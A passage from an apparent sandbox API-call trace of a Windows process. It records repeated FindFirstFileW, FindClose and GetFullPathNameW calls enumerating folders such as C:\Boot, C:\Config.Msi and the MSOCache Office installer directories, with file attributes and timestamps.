ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.362] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.362] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.362] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0093.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0093.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0093.363] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x6ee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0093.363] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x6ee69c, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0093.363] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.363] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.363] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.363] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.363] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.363] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0093.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0093.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0093.364] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings", nBufferLength=0x105, lpBuffer=0x6ee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0093.364] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings\\", nBufferLength=0x105, lpBuffer=0x6ee69c, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings\\", lpFilePart=0x0) returned 0x1a [0093.364] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0093.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb84) returned 1 [0093.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0093.366] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x6ee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0093.366] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x6ee69c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0093.366] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.366] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.366] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.366] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.366] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.367] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.367] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.370] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.371] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.372] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.372] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.374] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.374] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.374] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.374] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.376] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.376] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.377] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.378] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.380] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.381] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.382] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.383] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.393] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.394] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.394] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.395] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.396] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.396] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.396] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.396] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.399] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.399] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.400] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.401] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.402] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.402] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.402] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.402] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.403] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.403] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.404] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.404] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.404] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.404] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.404] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.404] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.407] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.407] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.408] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.409] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.410] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.411] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.412] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.413] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.413] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.413] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.413] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.413] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.415] FindClose (in: hFindFile=0xb440e8 